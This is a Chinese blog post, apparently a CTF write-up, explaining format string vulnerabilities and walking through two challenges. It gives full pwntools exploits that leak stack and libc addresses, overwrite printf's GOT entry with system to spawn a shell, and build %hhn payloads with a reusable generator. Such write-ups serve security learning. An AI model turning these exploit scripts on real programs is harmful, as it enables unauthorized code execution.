<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width">
<meta name="theme-color" content="#222"><meta name="generator" content="Hexo 7.3.0">

  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">



<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.7.2/css/all.min.css" integrity="sha256-dABdfBfUoC8vJUBOwGVdm8L9qlMWaHTIfXt+7GnZCIo=" crossorigin="anonymous">
  <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/animate.css/3.1.1/animate.min.css" integrity="sha256-PR7ttpcvz8qrF57fur/yAx1qXMFJeJFiA6pSzWi0OIE=" crossorigin="anonymous">

<script class="next-config" data-name="main" type="application/json">{"hostname":"example.com","root":"/","images":"/images","scheme":"Gemini","darkmode":false,"version":"8.23.1","exturl":false,"sidebar":{"position":"left","width_expanded":320,"width_dual_column":240,"display":"post","padding":18,"offset":12},"hljswrap":true,"codeblock":{"theme":{"light":"default","dark":"stackoverflow-dark"},"prism":{"light":"prism","dark":"prism-dark"},"copy_button":{"enable":false,"style":null},"fold":{"enable":false,"height":500},"language":false},"bookmark":{"enable":false,"color":"#222","save":"auto"},"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"stickytabs":false,"motion":{"enable":true,"async":false,"duration":200,"transition":{"menu_item":"fadeInDown","post_block":"fadeIn","post_header":"fadeInDown","post_body":"fadeInDown","coll_header":"fadeInLeft","sidebar":"fadeInUp"}},"i18n":{"placeholder":"Searching...","empty":"We didn't find any results for the search: ${query}","hits_time":"${hits} results found in ${time} ms","hits":"${hits} results found"}}</script><script src="/js/config.js" defer></script>

    <meta name="description" content="格式化字符串漏洞一、知识储备1. 格式化字符串是什么在C语言中，我们经常会使用到printf之类的函数来输出，printf函数的第一个参数就是一个格式化字符串。在格式化字符串中，我们可以使用占位符，指定格式，这些占位符用来替代后面的变量或者是数据。例如：更多关于格式化字符串的教程可以这里查看在此我就不过多说明了。 2. 漏洞原理我们可以使用%数字+$的形式，指定参数相对于格式化字符串的偏移，我">
<meta property="og:type" content="article">
<meta property="og:title" content="格式化字符串漏洞">
<meta property="og:url" content="http://example.com/2025/06/17/fmt%E5%88%9D%E8%AF%86/index.html">
<meta property="og:site_name" content="PWN好难学">
<meta property="og:description" content="格式化字符串漏洞一、知识储备1. 格式化字符串是什么在C语言中，我们经常会使用到printf之类的函数来输出，printf函数的第一个参数就是一个格式化字符串。在格式化字符串中，我们可以使用占位符，指定格式，这些占位符用来替代后面的变量或者是数据。例如：更多关于格式化字符串的教程可以这里查看在此我就不过多说明了。 2. 漏洞原理我们可以使用%数字+$的形式，指定参数相对于格式化字符串的偏移，我">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="https://gitee.com/Fa1lSnow/pic/raw/master/20250617130621739.png">
<meta property="og:image" content="https://gitee.com/Fa1lSnow/pic/raw/master/20250617130621729.png">
<meta property="og:image" content="https://gitee.com/Fa1lSnow/pic/raw/master/20250617130708114.png">
<meta property="og:image" content="https://gitee.com/Fa1lSnow/pic/raw/master/20250617130621723.png">
<meta property="og:image" content="https://gitee.com/Fa1lSnow/pic/raw/master/20250617130719430.png">
<meta property="og:image" content="https://gitee.com/Fa1lSnow/pic/raw/master/20250617130731723.png">
<meta property="og:image" content="https://gitee.com/Fa1lSnow/pic/raw/master/20250617130622410.png">
<meta property="og:image" content="https://gitee.com/Fa1lSnow/pic/raw/master/20250617130821407.png">
<meta property="article:published_time" content="2025-06-17T05:05:54.000Z">
<meta property="article:modified_time" content="2025-06-17T05:18:01.213Z">
<meta property="article:author" content="Fa1lSnow">
<meta property="article:tag" content="fmt">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://gitee.com/Fa1lSnow/pic/raw/master/20250617130621739.png">


<link rel="canonical" href="http://example.com/2025/06/17/fmt%E5%88%9D%E8%AF%86/">


<script class="next-config" data-name="page" type="application/json">{"sidebar":"","isHome":false,"isPost":true,"lang":"en","comments":true,"permalink":"http://example.com/2025/06/17/fmt%E5%88%9D%E8%AF%86/","path":"2025/06/17/fmt初识/","title":"格式化字符串漏洞"}</script>

<script class="next-config" data-name="calendar" type="application/json">""</script>
<title>格式化字符串漏洞 | PWN好难学</title>
  








  
  <script src="https://cdnjs.cloudflare.com/ajax/libs/animejs/3.2.1/anime.min.js" integrity="sha256-XL2inqUJaslATFnHdJOi9GfQ60on8Wx1C2H8DYiN1xY=" crossorigin="anonymous" defer></script>
<script src="/js/utils.js" defer></script><script src="/js/motion.js" defer></script><script src="/js/sidebar.js" defer></script><script src="/js/next-boot.js" defer></script>

  






  





  <noscript>
    <link rel="stylesheet" href="/css/noscript.css">
  </noscript>
</head>

<body itemscope itemtype="http://schema.org/WebPage" class="use-motion">
  <div class="headband"></div>

  <main class="main">
    <div class="column">
      <header class="header" itemscope itemtype="http://schema.org/WPHeader"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="Toggle navigation bar" role="button">
        <span class="toggle-line"></span>
        <span class="toggle-line"></span>
        <span class="toggle-line"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <i class="logo-line"></i>
      <p class="site-title">PWN好难学</p>
      <i class="logo-line"></i>
    </a>
      <p class="site-subtitle" itemprop="description"> 落雪的小玩意</p>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger" aria-label="Search" role="button">
    </div>
  </div>
</div>



<nav class="site-nav">
  <ul class="main-menu menu"><li class="menu-item menu-item-home"><a href="/" rel="section"><i class="fa fa-home fa-fw"></i>Home</a></li><li class="menu-item menu-item-about"><a href="/about/" rel="section"><i class="fa fa-user fa-fw"></i>About</a></li><li class="menu-item menu-item-tags"><a href="/tags/" rel="section"><i class="fa fa-tags fa-fw"></i>Tags</a></li><li class="menu-item menu-item-categories"><a href="/categories/" rel="section"><i class="fa fa-th fa-fw"></i>Categories</a></li><li class="menu-item menu-item-archives"><a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>Archives</a></li>
  </ul>
</nav>




</header>
        
  
  <aside class="sidebar">

    <div class="sidebar-inner sidebar-nav-active sidebar-toc-active">
      <ul class="sidebar-nav">
        <li class="sidebar-nav-toc">
          Table of Contents
        </li>
        <li class="sidebar-nav-overview">
          Overview
        </li>
      </ul>

      <div class="sidebar-panel-container">
        <!--noindex-->
        <div class="post-toc-wrap sidebar-panel">
            <div class="post-toc animated"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#%E6%A0%BC%E5%BC%8F%E5%8C%96%E5%AD%97%E7%AC%A6%E4%B8%B2%E6%BC%8F%E6%B4%9E"><span class="nav-number">1.</span> <span class="nav-text">格式化字符串漏洞</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#%E4%B8%80%E3%80%81%E7%9F%A5%E8%AF%86%E5%82%A8%E5%A4%87"><span class="nav-number">1.1.</span> <span class="nav-text">一、知识储备</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#1-%E6%A0%BC%E5%BC%8F%E5%8C%96%E5%AD%97%E7%AC%A6%E4%B8%B2%E6%98%AF%E4%BB%80%E4%B9%88"><span class="nav-number">1.1.1.</span> <span class="nav-text">1. 格式化字符串是什么</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#2-%E6%BC%8F%E6%B4%9E%E5%8E%9F%E7%90%86"><span class="nav-number">1.1.2.</span> <span class="nav-text">2. 漏洞原理</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E4%BA%8C%E3%80%81%E4%BE%8B%E9%A2%98%E5%88%86%E6%9E%90%EF%BC%88%E9%A2%98%E7%9B%AE%E9%99%84%E4%BB%B6%E6%94%BE%E5%9C%A8%E6%96%87%E6%9C%AB%EF%BC%89"><span class="nav-number">1.2.</span> <span class="nav-text">二、例题分析（题目附件放在文末）</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#1-babyfmt"><span class="nav-number">1.2.1.</span> <span class="nav-text">1.babyfmt</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#2-fmt-str-level-1-x86"><span class="nav-number">1.2.2.</span> <span class="nav-text">2.fmt_str_level_1_x86</span></a></li></ol></li></ol></li></ol></div>
        </div>
        <!--/noindex-->

        <div class="site-overview-wrap sidebar-panel">
          <div class="site-author animated" itemprop="author" itemscope itemtype="http://schema.org/Person">
    <img class="site-author-image" itemprop="image" alt="Fa1lSnow"
      src="/uploads/avatar.jpg">
  <p class="site-author-name" itemprop="name">Fa1lSnow</p>
  <div class="site-description" itemprop="description"></div>
</div>
<div class="site-state-wrap animated">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
        <a href="/archives/">
          <span class="site-state-item-count">7</span>
          <span class="site-state-item-name">posts</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
          <a href="/categories/">
        <span class="site-state-item-count">1</span>
        <span class="site-state-item-name">categories</span></a>
      </div>
      <div class="site-state-item site-state-tags">
          <a href="/tags/">
        <span class="site-state-item-count">8</span>
        <span class="site-state-item-name">tags</span></a>
      </div>
  </nav>
</div>

        </div>
      </div>
    </div>

    
  </aside>


    </div>

    <div class="main-inner post posts-expand">


  


<div class="post-block">
  
  

  <article itemscope itemtype="http://schema.org/Article" class="post-content" lang="en">
    <link itemprop="mainEntityOfPage" href="http://example.com/2025/06/17/fmt%E5%88%9D%E8%AF%86/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/uploads/avatar.jpg">
      <meta itemprop="name" content="Fa1lSnow">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="PWN好难学">
      <meta itemprop="description" content="">
    </span>

    <span hidden itemprop="post" itemscope itemtype="http://schema.org/CreativeWork">
      <meta itemprop="name" content="格式化字符串漏洞 | PWN好难学">
      <meta itemprop="description" content="">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          格式化字符串漏洞
        </h1>

        <div class="post-meta-container">
          <div class="post-meta">
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-calendar"></i>
      </span>
      <span class="post-meta-item-text">Posted on</span>
      

      <time title="Created: 2025-06-17 13:05:54 / Modified: 13:18:01" itemprop="dateCreated datePublished" datetime="2025-06-17T13:05:54+08:00">2025-06-17</time>
    </span>
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-folder"></i>
      </span>
      <span class="post-meta-item-text">In</span>
        <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
          <a href="/categories/PWN/" itemprop="url" rel="index"><span itemprop="name">PWN</span></a>
        </span>
    </span>

  
</div>

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody"><meta name="referrer" content="no-referrer" />

<h1 id="格式化字符串漏洞"><a href="#格式化字符串漏洞" class="headerlink" title="格式化字符串漏洞"></a>格式化字符串漏洞</h1><h2 id="一、知识储备"><a href="#一、知识储备" class="headerlink" title="一、知识储备"></a>一、知识储备</h2><h3 id="1-格式化字符串是什么"><a href="#1-格式化字符串是什么" class="headerlink" title="1. 格式化字符串是什么"></a>1. 格式化字符串是什么</h3><p>在C语言中，我们经常会使用到printf之类的函数来输出，printf函数的<strong>第一个参数就是一个格式化字符串</strong>。在格式化字符串中，我们可以使用占位符，指定格式，这些占位符用来替代后面的变量或者是数据。<br>例如：<br><img src="https://gitee.com/Fa1lSnow/pic/raw/master/20250617130621739.png" alt="image"><br>更多关于格式化字符串的教程可以<a target="_blank" rel="noopener" href="https://www.runoob.com/cprogramming/c-function-printf.html">这里</a>查看在此我就不过多说明了。</p>
<h3 id="2-漏洞原理"><a href="#2-漏洞原理" class="headerlink" title="2. 漏洞原理"></a>2. 漏洞原理</h3><p>我们可以使用%数字+$的形式，指定参数相对于格式化字符串的偏移，我们来看看这个程序的运行结果<br><img src="https://gitee.com/Fa1lSnow/pic/raw/master/20250617130621729.png" alt="image"><br>传入参数的顺序没有变化，但是输出参数的顺序改变了。%4$s %3$s %2$s %1$s分别对应格式化字符串后面的第4、3、2、1个参数。<br>因此通过以上操作（在权限允许的范围内）我们就能够实现：</p>
<ul>
<li>任意地址泄露：<strong>使用%+数字+$</strong></li>
<li>任意地址写入：<strong>%数字c%数字$n</strong></li>
</ul>
<h2 id="二、例题分析（题目附件放在文末）"><a href="#二、例题分析（题目附件放在文末）" class="headerlink" title="二、例题分析（题目附件放在文末）"></a>二、例题分析（题目附件放在文末）</h2><h3 id="1-babyfmt"><a href="#1-babyfmt" class="headerlink" title="1.babyfmt"></a>1.babyfmt</h3><p>拿到题目先检查保护措施并运行一遍。<br><img src="https://gitee.com/Fa1lSnow/pic/raw/master/20250617130708114.png" alt="image-20250617130708065"><br>了解基本情况之后，我们用ida来看看程序的运行逻辑。main函数非常简单，只调用了一个dofunc函数。<br><img src="https://gitee.com/Fa1lSnow/pic/raw/master/20250617130621723.png" alt="image"><br>程序的运行逻辑非常简单，只要<strong>v1等于100就可以getshell</strong>了。（当然，溢出的方法能做，这里主要讲格式化字符串的方法。）所以思路非常简单，我们只需要<strong>通过格式化字符串修改v1的值为100</strong>就可以了。<br>首先我们要获取rbp的位置，我们可以通过读取rbp中的值，然后再把<strong>拿到的值减去0x10就是当前rbp的值</strong>，然后再减去0x8就时我们要修改的内存部分了。我们先来动态调试看一下rbp相对于格式化字符串的位置。<br><img src="https://gitee.com/Fa1lSnow/pic/raw/master/20250617130719430.png" alt="image-20250617130719383"><br>可以看到，<strong>rsp和rbp相距0x40</strong>字节，所以偏移就是<strong>5 + 64&#x2F;8 + 1 &#x3D; 14</strong>（5指的除了rdi之外的另外5个用于参数传递的寄存器），我们的payload1就构造好了。<br><code>payload1 = payload1 = b&#39;%14$p&#39;</code><br>然后我们接收，并<strong>将这个地址减去0x18</strong>就是<strong>rbp-8</strong>的地址了。拿到地址之后我们再通过<code>%100c%x$hhn</code>就能够修改这个地址的值了。下面，我们来计算处x的值。先如下构造payload2。<br><code>payload2 = b&quot;%100c%x$hhn&quot; +b&#39;a&#39;*0x5 + p64(rbp_8_addr)</code>(a用于对齐)然后gdb动调。<br><img src="https://gitee.com/Fa1lSnow/pic/raw/master/20250617130731723.png" alt="image-20250617130731675"><br>那么<strong>x &#x3D; 5 + 48&#x2F;8 + 1 &#x3D; 12</strong>。所以payload2如下：<br><code>payload2 = b&quot;%100c%12$hhnaaaa&quot; + p64(rbp_8_addr)</code></p>
<p>到此这道题就做完了。完整的exp如下：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"><span class="keyword">if</span> __name__==<span class="string">&#x27;__main__&#x27;</span>:</span><br><span class="line">    context(log_level=<span class="string">&#x27;debug&#x27;</span> , arch=<span class="string">&#x27;amd64&#x27;</span> , os=<span class="string">&#x27;linux&#x27;</span>)</span><br><span class="line">    elf = ELF(<span class="string">&#x27;./babyfmt&#x27;</span>)</span><br><span class="line"></span><br><span class="line">    io =process(<span class="string">&quot;./babyfmt&quot;</span>)</span><br><span class="line">    gdb.attach(io)</span><br><span class="line">    <span class="comment">#payload = b&#x27;a&#x27; * 0x18 + p64(100)</span></span><br><span class="line">    payload1 = <span class="string">b&#x27;%14$p&#x27;</span></span><br><span class="line">    io.sendafter(<span class="string">&quot;input:\n&quot;</span> , payload1)</span><br><span class="line"></span><br><span class="line">    stack = <span class="built_in">int</span>(io.recvline()[ <span class="number">2</span> : <span class="number">14</span>] , <span class="number">16</span>)</span><br><span class="line">    <span class="built_in">print</span>(<span class="string">&quot;stack:&quot;</span> , <span class="built_in">hex</span>(stack))</span><br><span class="line"></span><br><span class="line">    value_addr = stack - <span class="number">0x18</span></span><br><span class="line"></span><br><span class="line">    payload2 = <span class="string">b&quot;%100c%12$hhnaaaa&quot;</span> + p64(value_addr)</span><br><span class="line">    io.send(payload2)</span><br><span class="line">    io.interactive()</span><br></pre></td></tr></table></figure>


<h3 id="2-fmt-str-level-1-x86"><a href="#2-fmt-str-level-1-x86" class="headerlink" title="2.fmt_str_level_1_x86"></a>2.fmt_str_level_1_x86</h3><p>拿到题目还是先查看一下保护措施，然后运行一下。<br><img src="https://gitee.com/Fa1lSnow/pic/raw/master/20250617130622410.png" alt="image"><br>了解基本情况之后，我们用ida来看看程序的运行逻辑。main函数非常简单，只调用了一个dofunc函数，我们直接分析这个dofunc函数。<br><img src="https://gitee.com/Fa1lSnow/pic/raw/master/20250617130821407.png" alt="image-20250617130821365"></p>
<p>这次没有system给我们跳转了，但是got表时可写的，所以我们可以通过<strong>修改printf函数的地址为system的地址</strong>然后参数传入**&#x2F;bin&#x2F;sh**来getshell。</p>
<p>由于这道题开启了PIE所以我们无法直接从IDA读取地址，我们先通过格式化字符串漏洞泄露函数返回值的地址（就是main函数中 <code>call dofunc</code>之后的下一条指令）然后找到main函数的入口地址，main函数的入口地址减去<strong>main函数与printf函数的got表地址之间的偏移量</strong>就可以获得printf函数的got表的地址了。通过动态调试得知，dofunc函数的返回地址相对于格式化字符串的偏移为75（32位程序的计算直接数就好了，这里就不带着去找了），所以payload1如下：<br><code>payload1 = b&#39;%75$p&#39;</code><br>接收got表的地址并处理如下：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">main_addr = main_p30_addr - <span class="number">30</span></span><br><span class="line"><span class="built_in">print</span>(<span class="string">&quot;main_addr:&quot;</span> , <span class="built_in">hex</span>(main_addr))</span><br><span class="line">offset = elf.symbols[<span class="string">&#x27;main&#x27;</span>] - elf.got[<span class="string">&#x27;printf&#x27;</span>]</span><br><span class="line">printf_got_addr = main_addr - offset</span><br><span class="line"><span class="built_in">print</span>(<span class="string">&quot;printf_got_addr:&quot;</span> , <span class="built_in">hex</span>(printf_got_addr))</span><br></pre></td></tr></table></figure>
<p>下一步我们就是要读取printf的got表拿到printf函数的真实地址了，payload2如下：<br><code>payload2 = p32(printf_got_addr) + b&#39;%7$s\x00&#39;</code><br>接收到真实地址之后我们需要计算出<strong>system函数</strong>和**&#x2F;bin&#x2F;sh的地址**（和普通的libc题目一样），相关代码如下：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">print_real_addr = u32(io.recv(<span class="number">8</span>)[ <span class="number">4</span> : <span class="number">8</span>])</span><br><span class="line"><span class="built_in">print</span>(<span class="string">&quot;print_real_addr:&quot;</span> , <span class="built_in">hex</span>(print_real_addr))</span><br><span class="line"></span><br><span class="line">libcbase = print_real_addr - libc.sym[<span class="string">&quot;printf&quot;</span>]</span><br><span class="line">sys_addr = libcbase + libc.sym[<span class="string">&quot;system&quot;</span>]</span><br><span class="line">binsh_addr = libcbase + <span class="built_in">next</span>(libc.search(<span class="string">b&#x27;/bin/sh&#x27;</span>))</span><br><span class="line"><span class="built_in">print</span>(<span class="string">&quot;sys_addr:&quot;</span> , <span class="built_in">hex</span>(sys_addr))</span><br><span class="line"><span class="built_in">print</span>(<span class="string">&quot;binshi_addr:&quot;</span> , <span class="built_in">hex</span>(binsh_addr))</span><br><span class="line"></span><br></pre></td></tr></table></figure>
<p>下一步我们需要通过%n改地址。但是由于地址是一个十分大的数字，<strong>直接使用%n改掉可能会引发崩溃</strong>，所以这里我们<strong>一个字节一个字节地改地址</strong>。老规矩，我们通过动调找到了第一个字节的地址相对于格式化字符串的偏移量位7，由于要修改4次地址，我们简单的写一个脚本帮我们构造payload。</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">def</span> <span class="title function_">fmt</span>(<span class="params">prev, word, index</span>):</span><br><span class="line">    fmtstr = <span class="string">&quot;&quot;</span></span><br><span class="line">    <span class="keyword">if</span> prev &lt; word:</span><br><span class="line">        result = word - prev</span><br><span class="line">        fmtstr += <span class="string">&quot;%&quot;</span> + <span class="built_in">str</span>(result) + <span class="string">&quot;c&quot;</span></span><br><span class="line">    <span class="keyword">elif</span> prev == word:</span><br><span class="line">        result = <span class="number">0</span></span><br><span class="line">    <span class="keyword">else</span>:</span><br><span class="line">        result = <span class="number">256</span> + word - prev</span><br><span class="line">        fmtstr = <span class="string">&quot;%&quot;</span> + <span class="built_in">str</span>(result) + <span class="string">&quot;c&quot;</span></span><br><span class="line">    fmtstr += <span class="string">&quot;%&quot;</span> + <span class="built_in">str</span>(index) + <span class="string">&quot;$hhn&quot;</span></span><br><span class="line">    <span class="keyword">return</span> fmtstr.encode(<span class="string">&#x27;utf-8&#x27;</span>)</span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">fmt_str</span>(<span class="params">offset, size, addr, target</span>):</span><br><span class="line">    <span class="comment"># offset 偏移位置  size 32?64  addr写入地址   target 写入内容</span></span><br><span class="line">    payload = <span class="string">b&quot;&quot;</span></span><br><span class="line">    <span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">4</span>):</span><br><span class="line">        <span class="keyword">if</span> size == <span class="number">4</span>:</span><br><span class="line">            payload += p32(addr + i)</span><br><span class="line">        <span class="keyword">else</span>:</span><br><span class="line">            payload += p64(addr + i)</span><br><span class="line">    prev = <span class="built_in">len</span>(payload)</span><br><span class="line">    <span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">4</span>):</span><br><span class="line">        payload += fmt(prev, (target &gt;&gt; i * <span class="number">8</span>) &amp; <span class="number">0xff</span>, offset + i)</span><br><span class="line">        prev = (target &gt;&gt; i * <span class="number">8</span>) &amp; <span class="number">0xff</span></span><br><span class="line">    <span class="keyword">return</span> payload</span><br></pre></td></tr></table></figure>
<p>然后我们调用这个函数来生成payload3<br><code>payload3 = fmt_str( 7 , 4 , printf_got_addr , sys_addr)</code><br>最后我们只需要把**&#x2F;bin&#x2F;sh**传过去就可以了。payload4如下<br><code>payload4 = p32(binsh_addr)</code></p>
<p>完整的exp如下：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br></pre></td><td class="code"><pre><span class="line">from pwn import *</span><br><span class="line"></span><br><span class="line">def fmt(prev, word, index):</span><br><span class="line">    fmtstr = &quot;&quot;</span><br><span class="line">    if prev &lt; word:</span><br><span class="line">        result = word - prev</span><br><span class="line">        fmtstr += &quot;%&quot; + str(result) + &quot;c&quot;</span><br><span class="line">    elif prev == word:</span><br><span class="line">        result = 0</span><br><span class="line">    else:</span><br><span class="line">        result = 256 + word - prev</span><br><span class="line">        fmtstr = &quot;%&quot; + str(result) + &quot;c&quot;</span><br><span class="line">    fmtstr += &quot;%&quot; + str(index) + &quot;$hhn&quot;</span><br><span class="line">    return fmtstr.encode(&#x27;utf-8&#x27;)</span><br><span class="line"></span><br><span class="line">def fmt_str(offset, size, addr, target):</span><br><span class="line">    # offset 偏移位置  size 32?64  addr写入地址   target 写入内容</span><br><span class="line">    payload = b&quot;&quot;</span><br><span class="line">    for i in range(4):</span><br><span class="line">        if size == 4:</span><br><span class="line">            payload += p32(addr + i)</span><br><span class="line">        else:</span><br><span class="line">            payload += p64(addr + i)</span><br><span class="line">    prev = len(payload)</span><br><span class="line">    for i in range(4):</span><br><span class="line">        payload += fmt(prev, (target &gt;&gt; i * 8) &amp; 0xff, offset + i)</span><br><span class="line">        prev = (target &gt;&gt; i * 8) &amp; 0xff</span><br><span class="line">    return payload</span><br><span class="line"></span><br><span class="line">if __name__==&#x27;__main__&#x27;:</span><br><span class="line">    context(arch=&#x27;i386&#x27;, os=&#x27;linux&#x27;, log_level=&#x27;debug&#x27;)</span><br><span class="line">    #context.terminal=[&#x27;tmux&#x27;, &#x27;splitw&#x27;, &#x27;-h&#x27;]</span><br><span class="line">    pwnfile = &#x27;./fmt_str_level_1_x86&#x27;</span><br><span class="line">    elf = ELF(pwnfile)</span><br><span class="line">    libc = ELF(&#x27;/lib/i386-linux-gnu/libc.so.6&#x27;)</span><br><span class="line">    io = process(pwnfile)</span><br><span class="line"></span><br><span class="line">   # gdb.attach(io)</span><br><span class="line">    payload1 = b&#x27;%75$p&#x27;</span><br><span class="line">    io.send(payload1)</span><br><span class="line">    io.recvuntil(&quot;input:\n&quot;)</span><br><span class="line">    main_p30_addr = int(io.recv(10)[2 : 10] , 16 )</span><br><span class="line">    main_addr = main_p30_addr - 30</span><br><span class="line">    print(&quot;main_addr:&quot; , hex(main_addr))</span><br><span class="line">    offset = elf.symbols[&#x27;main&#x27;] - elf.got[&#x27;printf&#x27;]</span><br><span class="line"></span><br><span class="line">    printf_got_addr = main_addr - offset</span><br><span class="line">    print(&quot;printf_got_addr:&quot; , hex(printf_got_addr))</span><br><span class="line"></span><br><span class="line">    io.recvuntil(&quot;input:\n&quot;)</span><br><span class="line">    payload2 = p32(printf_got_addr) + b&#x27;%7$s\x00&#x27;</span><br><span class="line">    io.send(payload2)</span><br><span class="line"></span><br><span class="line">    print_real_addr = u32(io.recv(8)[ 4 : 8])</span><br><span class="line">    print(&quot;print_real_addr:&quot; , hex(print_real_addr))</span><br><span class="line"></span><br><span class="line">    libcbase = print_real_addr - libc.sym[&quot;printf&quot;]</span><br><span class="line">    sys_addr = libcbase + libc.sym[&quot;system&quot;]</span><br><span class="line">    binsh_addr = libcbase + next(libc.search(b&#x27;/bin/sh&#x27;))</span><br><span class="line">    print(&quot;sys_addr:&quot; , hex(sys_addr))</span><br><span class="line">    print(&quot;binshi_addr:&quot; , hex(binsh_addr))</span><br><span class="line"></span><br><span class="line">    io.recvuntil(&quot;input:\n&quot;)</span><br><span class="line">    payload3 = fmt_str( 7 , 4 , printf_got_addr , sys_addr)</span><br><span class="line">    print( &quot;payload3:&quot; , payload3)</span><br><span class="line">    io.send(payload3)</span><br><span class="line"></span><br><span class="line">    io.recvuntil(&quot;input:\n&quot;)</span><br><span class="line">    payload4 = p32(binsh_addr)</span><br><span class="line">    io.send(payload4)</span><br><span class="line"></span><br><span class="line">    io.interactive()</span><br></pre></td></tr></table></figure>
<p><a target="_blank" rel="noopener" href="https://wwyq.lanzouo.com/ip6Km2g06pdi" title="题目附件">题目附件</a></p>

    </div>

    
    
    

    <footer class="post-footer">
          <div class="post-tags">
              <a href="/tags/fmt/" rel="tag"># fmt</a>
          </div>

        

          <div class="post-nav">
            <div class="post-nav-item">
                <a href="/2025/06/17/LargeBinAttack/" rel="prev" title="LargeBinAttack高低版本的利用">
                  <i class="fa fa-angle-left"></i> LargeBinAttack高低版本的利用
                </a>
            </div>
